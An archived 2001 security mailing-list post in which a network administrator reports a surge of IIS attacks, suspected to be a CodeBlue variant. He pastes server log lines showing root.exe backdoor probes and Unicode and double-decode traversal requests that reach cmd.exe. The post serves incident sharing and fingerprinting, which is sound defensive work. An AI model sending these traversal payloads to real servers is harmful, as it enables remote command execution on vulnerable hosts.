CodeBlue finally hitting, or what?

From: Portnoy, Gary (gportnoyat_private)
Date: Tue Sep 18 2001 - 07:24:00 PDT

  • Next message: Fred Cohen: "More complete log - looks viral to me..." 

    Greetings,

I am suddenly seeing hundreds of Unicode traversal requests coming in from
all over the world, many of them from previous CodeRed victims.  I am
guessing someone changed CodeBlue to make it spread faster, because before I
saw maybe 1 or 2 CodeBlue attempts a day, and so far i've seen at least 20
in the last hour.  Just a a way to help fingerprint it, a few of the
attempted exploits use the multiple decode vulnerability....

-Gary-

12.27.232.252 - - [18/Sep/2001:10:16:47 -0400] "GET /scripts/root.exe?/c+dir
HTTP/1.0" 404 287 "-" "-"
12.27.232.252 - - [18/Sep/2001:10:16:48 -0400] "GET /MSADC/root.exe?/c+dir
HTTP/1.0" 404 285 "-" "-"
12.27.232.252 - - [18/Sep/2001:10:16:48 -0400] "GET
/c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 295 "-" "-"
12.27.232.252 - - [18/Sep/2001:10:16:49 -0400] "GET
/d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 295 "-" "-"
12.27.232.252 - - [18/Sep/2001:10:16:49 -0400] "GET
/scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309 "-" "-"
12.27.232.252 - - [18/Sep/2001:10:16:50 -0400] "GET
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 326 "-" "-"
12.27.232.252 - - [18/Sep/2001:10:16:50 -0400] "GET
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 326 "-" "-"
12.27.232.252 - - [18/Sep/2001:10:16:50 -0400] "GET
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/sy
stem32/cmd.exe?/c+dir HTTP/1.0" 404 342 "-" "-"
12.27.232.252 - - [18/Sep/2001:10:16:51 -0400] "GET
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308 "-" "-"
12.27.232.252 - - [18/Sep/2001:10:16:52 -0400] "GET
/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308 "-" "-"
12.27.232.252 - - [18/Sep/2001:10:16:52 -0400] "GET
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308 "-" "-"
12.27.232.252 - - [18/Sep/2001:10:16:56 -0400] "GET
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308 "-" "-"
12.27.232.252 - - [18/Sep/2001:10:16:56 -0400] "GET
/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 292 "-" "-"
12.27.232.252 - - [18/Sep/2001:10:17:00 -0400] "GET
/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 292 "-" "-"
12.27.232.252 - - [18/Sep/2001:10:17:00 -0400] "GET
/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309 "-"
"-"
12.27.232.252 - - [18/Sep/2001:10:17:01 -0400] "GET
/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309 "-" "-"

Gary Portnoy
Network Administrator
gportnoyat_private

PGP Fingerprint: 9D69 6A39 642D 78FD 207C  307D B37D E01A 2E89 9D2C


----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see: http://aris.securityfocus.com

    This archive was generated by hypermail 2b30 : Tue Sep 18 2001 - 08:20:52 PDT